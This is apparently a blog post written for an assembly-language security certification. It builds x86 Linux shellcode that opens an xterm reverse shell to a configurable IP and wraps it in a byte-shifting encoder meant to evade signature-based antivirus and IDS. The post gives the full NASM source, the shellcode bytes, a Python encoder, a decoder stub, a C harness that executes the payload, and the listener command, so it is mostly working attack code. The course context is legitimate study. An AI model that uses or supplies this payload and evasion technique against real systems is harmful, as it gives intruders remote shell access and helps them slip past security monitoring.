Thursday 8 September 2016

SLAE Assignment 4 - Custom Encoder


SLAE Assignment 4 - Custom Encoder 

 

Objective

In this assignment our task is to create a custom encoder/decoder to bypass an AV/ IDS which uses signature based analysis .

Step 1 : Shellcode Creation


The first step was to create a shellcode. I have seen some nice reverse shells from  bernardodamele.blogspot.ae which uses inbuilt OS functionalities / capabilities . I choose to create a shellcode based on xterm since i haven't tried that previously and wanted to have a look . Screenshot which shows the usage of Xterm reverse shell from bernardodamele.blogspot.ae

 

I was using an Ubuntu x86 OS and the command i wanted to use was this

xterm -display 127.1.1.1:10

Note: The above command will send an xterm display back to 127.1.1.1 with display 10 .
127.1.1.1 is also a loop back address similar to 127.0.0.1 , in fact all addresses from 127.0.0.1 to 127.255.255.254 are loop back addresses . I used 127.1.1.1 to remove the bad characters which can create issues in the shellcode

The shellcode was created using the execve stack technique and the following is my nasm file .
 --------------------------------------------------------------------------------------------------------------------

section .text
    global _start

_start:

xor eax,eax
xor edx,edx
xor esi,esi
xor ecx,ecx
push eax
push 0x30313a31 ; setting the listening IP and display , used  127.1.1.1:10 , change this section to set your IP
push 0x2e312e31
push 0x2e373231
mov esi,esp
push eax
push 0x79616c70 ; -display
push 0x7369642d
mov edi,esp
push eax
push 0x6d726574   ; ///usr/bin/xterm
push 0x782f6e69
push 0x622f7273
push 0x752f2f2f
mov ebx,esp
push eax
push esi
push edi
push ebx
mov ecx,esp
mov al,11
int 0x80

--------------------------------------------------------------------------------------------------------------------
 The nasm file was compiled and linked.




The op codes were checked to see if there are any bad characters























After that the op codes were dumped and our shellcode is obtained




The resulting shellcode is the following .

\x31\xc0\x31\xd2\x31\xf6\x31\xc9\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80

Step2 : Creating the Custom Encoder 


I used a simple arithmetic encoder to carry out the encoding task . The below python script will subtract the number "1" from each of the shellcode characters .

Python Encoder 

-------------------------------------------------------------------------------------------------------------------

#!/usr/bin/python


shellcode = ("\x31\xc0\x31\xd2\x31\xf6\x31\xc9\x50\x68\x31\x3a\x31\x30\x68\x31\x2e\x31\x2e\x68\x31\x32\x37\x2e\x89\xe6\x50\x68\x70\x6c\x61\x79\x68\x2d\x64\x69\x73\x89\xe7\x50\x68\x74\x65\x72\x6d\x68\x69\x6e\x2f\x78\x68\x73\x72\x2f\x62\x68\x2f\x2f\x2f\x75\x89\xe3\x50\x56\x57\x53\x89\xe1\xb0\x0b\xcd\x80")
encoded = ""
encoded2 = ""

print 'Encoded shellcode ...'

for x in bytearray(shellcode) :
        y = x-0x1
        encoded += '\\x'
        encoded += '%02x' % y

        encoded2 += '0x'
        encoded2 += '%02x,' %y


print encoded

print encoded2

print 'Len: %d' % len(bytearray(shellcode))
-------------------------------------------------------------------------------------------------------------------

 Assembly Decoder 

The decoder will add the number "1" to each of the characters to obtain the original shellcode and will execute the original shellcode 
-------------------------------------------------------------------------------------------------------------------
 ; Filename: arithmetic-decoder.nasm
; Purpose:

global _start

section .text
_start:

        jmp short call_decoder

decoder:
        pop esi
        xor ecx, ecx
        mov cl,72


decode:
        add byte [esi], 0x1
        inc esi
        loop decode

        jmp short Shellcode



call_decoder:

        call decoder
        Shellcode: db 0x30,0xbf,0x30,0xd1,0x30,0xf5,0x30,0xc8,0x4f,0x67,0x30,0x39,0x30,0x2f,0x67,0x30,0x2d,0x30,0x2d,0x67,0x30,0x31,0x36,0x2d,0x88,0xe5,0x4f,0x67,0x6f,0x6b,0x60,0x78,0x67,0x2c,0x63,0x68,0x72,0x88,0xe6,0x4f,0x67,0x73,0x64,0x71,0x6c,0x67,0x68,0x6d,0x2e,0x77,0x67,0x72,0x71,0x2e,0x61,0x67,0x2e,0x2e,0x2e,0x74,0x88,0xe2,0x4f,0x55,0x56,0x52,0x88,0xe0,0xaf,0x0a,0xcc,0x7f

 -----------------------------------------------------------------------------------------------------------------------------

Step 3 : Execution of Shellcode

As usual the assembly is compiled , linked and the opcodes are taken for the shellcode . 




Now we can use try out our shellcode using the below code . 
--------------------------------------------------------------------------------------------------------------------
#include<stdio.h>
#include<string.h>

unsigned char code[] = \
"\xeb\x0d\x5e\x31\xc9\xb1\x48\x80\x06\x01\x46\xe2\xfa\xeb\x05\xe8\xee\xff\xff\xff\x30\xbf\x30\xd1\x30\xf5\x30\xc8\x4f\x67\x30\x39\x30\x2f\x67\x30\x2d\x30\x2d\x67\x30\x31\x36\x2d\x88\xe5\x4f\x67\x6f\x6b\x60\x78\x67\x2c\x63\x68\x72\x88\xe6\x4f\x67\x73\x64\x71\x6c\x67\x68\x6d\x2e\x77\x67\x72\x71\x2e\x61\x67\x2e\x2e\x2e\x74\x88\xe2\x4f\x55\x56\x52\x88\xe0\xaf\x0a\xcc\x7f";
main()
{

        printf("Shellcode Length:  %d\n", strlen(code));

        int (*ret)() = (int(*)())code;

        ret();

}
 -------------------------------------------------------------------------------------------------------------------

Execution  

We will listen using the below command to catch the xterm reverse shell

Xnest :10 ( Will listen on display 10 ) .


















Note : No need to specify the port separately as the port will be automatically calculated based on the display . eg Xnest :1 will listen on TCP port 6001 and Xnest : 10 will listen on 6010
























Once our shellcode is executed a reverse shell is obtained on our listener.

This blog post has been created for completing the requirements of the SecurityTube Linux Assembly Expert certification
http://securitytube-training.com/online-courses/securitytube-linux-assembly-expert/
Student ID: SLAE – 739
All the files used can be found here https://github.com/rtv7/SLAE

No comments:

Post a Comment